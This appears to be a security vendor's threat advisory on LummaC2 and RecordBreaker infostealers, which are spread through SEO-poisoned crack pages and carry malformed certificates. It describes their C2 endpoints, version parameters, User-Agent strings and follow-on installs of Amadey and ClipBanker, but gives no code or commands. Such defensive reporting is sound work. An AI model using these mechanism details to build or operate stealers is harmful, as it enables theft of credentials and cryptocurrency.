Recently, there has been a high distribution rate of malware using abnormal certificates.
Malware often disguise themselves with normal certificates. However, in this case, the malware entered the certificate information randomly, with the Subject Name and Issuer Name fields having unusually long strings.
As a result, the certificate information is not visible in Windows operating systems, and a specific tool or infrastructure is required to inspect the structure of these certificates.
Of course, these certificates fail in signature verification since they are incorrect, and they cannot function as signatures in any way. However, when examining the signature strings, you can see that they include Arabic, Japanese, and other non-English languages, along with special characters and punctuation marks. This diverges from the typical English character string structures. Furthermore, similar samples of this kind have been consistently distributed with slight structural variations for over two months, suggesting a specific intent behind this action.
The latest sample currently in circulation (bottom right of Figure 1) consists of a string that URL encoded a malicious script. This script is designed to download and execute PowerShell commands from a specific address, but it is currently incapable of downloading. This script does not get executed during the infection process.
Among the malware currently being distributed with this kind of unique form, two strains can be predominantly identified: LummaC2 and RecordBreaker. Both of them are capable of performing various malicious behaviors, but they primarily have a strong focus on infostealing.
Upon infection, they can transmit sensitive user information such as browser-saved account credentials, documents, cryptocurrency wallet files, etc., to the threat actor, potentially resulting in severe secondary damages. Furthermore, an additional piece of malware designated by the threat actor gets installed, enabling continuous malicious behaviors.
These types of malware are distributed via malicious pages that are easily accessible through search engines (SEO poisoning), posing a threat to a wide range of unspecified users. These malicious pages primarily use keywords related to illegal programs such as serials, keygens, and cracks.
RecordBreaker is also known as Raccoon Stealer V2, and in addition to the distribution method mentioned above, it is actively being distributed through YouTube and other malware. Its use of meaningful sentences as the User-Agent value when connecting to the C2 server is one of its distinctive characteristics, and it changes this value periodically. The recent sample in distribution uses the string “GeekingToTheMoon”. Functionally, it has not changed significantly from what was described in previous posts.
- RecordBreaker Infostealer Disguised as a .NET Installer
- RecordBreaker Infostealer Disguised as a Well-known Korean Software
- RecordBreaker Stealer Distributed via Hacked YouTube Accounts
LummaC2 is the most actively evolving malware among the ones distributed using the method described in this post.
The initial sample had the configuration information embedded within the malware itself for its malicious behaviors. However, it later switched to downloading the configuration information from its C2 to perform malicious behaviors. It also shifted to install additional malware like Amadey and Clipbanker in addition to its simple infostealing behavior.
Information regarding the initial distribution sample is detailed in the post below. Following that will be a brief summary of the changes.
– Change of C2 communication method
Since the initial sample had the configuration information embedded, it would promptly collect information and transmit it to the “/c2sock” address upon execution.
Subsequent variants downloaded the configuration information from the “/c2conf” address and transmitted the information to the “/c2sock” address.
Recent samples in circulation use the “/api” address for both downloading the configuration and transmitting the information. Therefore, configuration query connections and information transmission connections are distinguished through the POST parameter upon accessing the C2.
With each significant variation, the “ver” parameter that is sent to the C2 upon execution was increased by 1. The current version is 4.0.
“.xyz” was used as the top-level domain (TLD) of the C2 URL for a significant period of time before being switched to the current “.fun”.
– Downloads additional malware
While earlier samples would simply steal information before terminating, later versions began installing the Amadey malware. Recent versions install both Amadey and Clipbanker.
As a downloader, Amadey enables threat actors to install whatever malware they want through C2 communication. It can even perform infostealing behavior through additional modules depending on the situation. ClipBanker is a type of malware that monitors the clipboard. If it detects the address of a cryptocurrency wallet being copied, it is changed to the threat actor’s address.
LummaC2 is terminated after stealing information and installing additional malware. However, the additionally installed malware remains in the user’s system, allowing for continuous C2 communication (waiting for commands) or wallet address tampering behaviors.
User caution is advised as Infostealers are being actively distributed to unsuspecting users and are evolving continuously.
AhnLab products are actively diagnosing these abnormal certificate structures. Additionally, an automated collection system for samples similar to those described in this post is in operation, enabling swift responses to variants and the blocking of associated C2 connections.
- Suspicious/Win.MalPe.X2197 (2023.09.14.00)
- Additionally Downloaded Malware